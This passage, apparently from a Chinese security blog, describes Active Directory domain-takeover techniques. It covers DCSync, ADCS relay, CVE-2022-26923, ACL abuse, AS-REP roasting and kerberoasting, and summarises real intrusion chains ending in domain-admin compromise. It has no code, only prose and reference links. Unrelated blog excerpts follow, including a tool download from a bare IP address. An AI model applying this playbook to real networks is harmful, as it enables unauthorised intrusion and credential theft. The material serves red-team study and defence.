ACE权限给指定的用户，允许模拟域控制器，请求域内帐户的哈希值，包括域管理员的哈希值，最终获取域控制器的控制权。实战文章：https://mp.weixin.qq.com/s/Uufa1SabEU2ndJ3Lt5Boighttps://mp.weixin.qq.com/s/sjlBpVjobkSKd_Uf0J_u2Ahttps://mp.weixin.qq.com/s/O6a40449vTKWUXS4kwD9xA2.6 ADCS漏洞ADCS Relay：内网里有 ADCS 服务，且开启了证书Web注册服务的话，攻击者只需要拥有一个域账号，再结合 PetitPotam 或者 PrintBug等强制认证漏洞完成，这里就不用配合CVE-2019-1040漏洞了，因为是Relay To HTTP，然后NTLM Relay拿到 DC 的 Base64 证书，通过asktgt拿到TGT，注入TGT配合DCSYNC，从而获取域控的权限。参考文章：https://mp.weixin.qq.com/s/lzBoMZfAXVR0Dj_ogO7oPAhttps://mp.weixin.qq.com/s/0s8BptnL8eWZr5k5fM0vxA实战文章：https://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSwESC系列这个看了下目前是ESC1-11了，上面提到的ASCS Relay是ESC-8，剩下的看下面参考文章吧。参考文章：https://mp.weixin.qq.com/s/aVURmXz8sTe56KBfyPutEwhttps://mp.weixin.qq.com/s/bqdI41850hUkAH89ofSMJwhttps://mp.weixin.qq.com/s/-qv0VbudiKr5QhD14b013Qhttps://mp.weixin.qq.com/s/bEoaWGp19z3P_CpolHxziACVE-2022-26923：此漏洞受Nopac利用思路的影响，将Nopac中Kerberos认证相关的问题，转向证书认证相关的问题。此漏洞通过将机器账户dNSHostName属性的值修改成与域控一样的方法，来获取域控的机器账户hash，从而获取域控的权限。参考文章：https://mp.weixin.qq.com/s/3DZPkG4Z9w8xbVKvW64Mgwhttps://mp.weixin.qq.com/s/ctpRXyhP7Zl9siAsh9Lsxw实战文章：https://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSw2.7 ACL滥用可以借助BloodHound分析ACL控制路径,发现可利用权限,比如如A用户对B用户有WriteDACL权限，就可以在A用户上修改B用户为GenericAll权限,让A用户对B用户拥有所有的访问控制权，然后也可以配合GPO滥用达到添加用户权限、添加一个本地管理员、添加一个新的计算机启动脚本等操作。ACL滥用比较经典的案例就是通过漏洞获得Exchange 权限后，由于特殊组的缘故导致其拥有WriteDACL权限，可以修改域内的ACL，赋予Dcsync ACE权限给指定的用户。参考文章：https://mp.weixin.qq.com/s/YCf-0FiqFfQ7WW0V5JR7jAhttps://mp.weixin.qq.com/s/mOVJ21KSArqsoAcV7piUxQhttps://mp.weixin.qq.com/s/XhbsSyDDV774LJ4o2QkSBw实战文章：https://mp.weixin.qq.com/s/r_bwyX2qj5VSqf3mVrnqGg2.8 Pre-Authentication&&AS-REP Roasting&&kerberoasting这几种都是针对域账户的，枚举用户或脱机爆破。参考文章：https://mp.weixin.qq.com/s/TH2BbrEj0X_1r2UkDD75vw0x3 实战文章推荐思考或尝试较多的几篇实战文章(建议细心阅读)：https://mp.weixin.qq.com/s/Iup2hZdPADFGDSi2AXP_Pghttps://mp.weixin.qq.com/s/bDH5LYjSPRtxUi1aGNpgSwhttps://mp.weixin.qq.com/s/tdPfi4y9vxvJAA2bR_VCcghttps://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSwhttps://mp.weixin.qq.com/s/z_jc0_HLqeRSCtLMG8NpEghttps://mp.weixin.qq.com/s/8OueE-bEIdkvwPWu3KqrcQ0x4 总结实战环境下还是要结合收集到的信息来制定有效的攻击路线，”实战文章推荐”建议好好阅读一下，涉及了很多知识点利用，思考的过程也都体现了出来。比如，”实战文章推荐”的第一篇，基于RBCD，通过ADFind或是LDAPsearch等导出LDAP信息，查询机器账户的mS-DS-CreatorSID属性对应的SID和用户账户对应的objectSid值，进行比较发现某用户拉入域内不少机器，推测可能是运维人员，通过鱼叉钓鱼拿下此用户权限配合RBCD拿下了一台域机器权限，之后上线CS进行信息收集，发现3389有连接记录，提取之后登录某WEB服务器，发现其连接的数据库是域内唯一注册了SPN属性的MSSQL服务，之后通过RottenTomato从SERVICE提权提权到了SYSTEM，之后发现有域管进程，至此成功拿下域控。”实战文章推荐”第二篇，使用了BloodHound来对域内收集信息且收集到m.child.xiaoli的域用户PO同时处于child.xiaoli的AS组（Enterprise Admins），然后通过寻找到达子域控的最短路径，发现当前ra用户处于SN组对主机PGO有管理员权限且PGO主机存在一个名为PGO的用户Session为子域控管理员权限，所以这里直接拿下了子域控，然后在子域上通过BloodHound分析当前PGO用户，发现PGO用户处于Administrators组且拥有GetChangesALL和GetChanges Dnsync权限，所以可以直接拿下PO用户凭据(Enterprise Admins)，也就拿下了域林。文中体现了具体的思考过程，多种方法，可以去详细看看。”实战文章推荐”第六篇，从WEBDAV XXE做NTLM Realy配合RBCD，但是RBCD需要一个机器账户，所以通过把在之前的discuz数据库中的用户名整理成字典，并通过 AS_REQ返回包来判断用户名是否存在，然后将discuz的密码拿到cmd5上批量解密，解密后发现大部分用户的登录密码都是P@ssw0rd，于是使用密码喷射，成功获取到了一个域凭据，有了域凭据后连接域控ldap添加机器账户，然后通过S4U申请ST票据登录WEBDAV服务器，最后通过ssp lsass绕过卡巴dump出了域管理员hash，成功拿下域控。最后还是做好域内信息收集吧，发现的比如，通讯录、运维密码本等这类信息也收集好，有时候对拿下域控也都有关键作用。

九紫离火运--道友，这泼天的富贵你可接好了！ 天时是成功之路的伯乐、机遇；地利是成功之路的环境、条件；人和是成功之路的综合实力。那么常说的“九紫离火运”，我们将有什么样的天时、地利运呢？

数据恢复工具 花了巨款收集来的免费数据恢复工具，针对电脑硬盘、u盘等误删除的文件进行恢复。注意！！！恢复的文件不要放到原来的盘上，不然可能会崩。链接：http://47.100.127.167/usr/uploads/tools/restore.rar